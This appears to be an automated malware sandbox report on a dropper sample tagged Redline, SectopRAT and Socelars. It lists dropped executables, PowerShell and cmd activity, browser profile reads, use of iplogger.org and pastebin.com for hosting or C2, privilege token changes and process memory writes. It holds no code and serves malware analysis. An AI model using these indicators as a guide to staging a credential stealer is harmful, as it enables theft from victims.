N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12b275ee70c7e913.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu120bfbc2443b3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1948 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1948 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1948 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1948 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1948 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1948 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1948 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2628 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
PID 2628 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
PID 2628 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
PID 2628 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
PID 2628 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
PID 2628 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
PID 2628 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
PID 2620 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe C:\Windows\SysWOW64\cmd.exe
